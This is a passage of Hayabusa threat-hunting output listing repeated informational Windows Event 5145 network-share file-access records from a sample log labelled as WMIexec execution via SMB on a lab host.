10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71 : IP Address: 
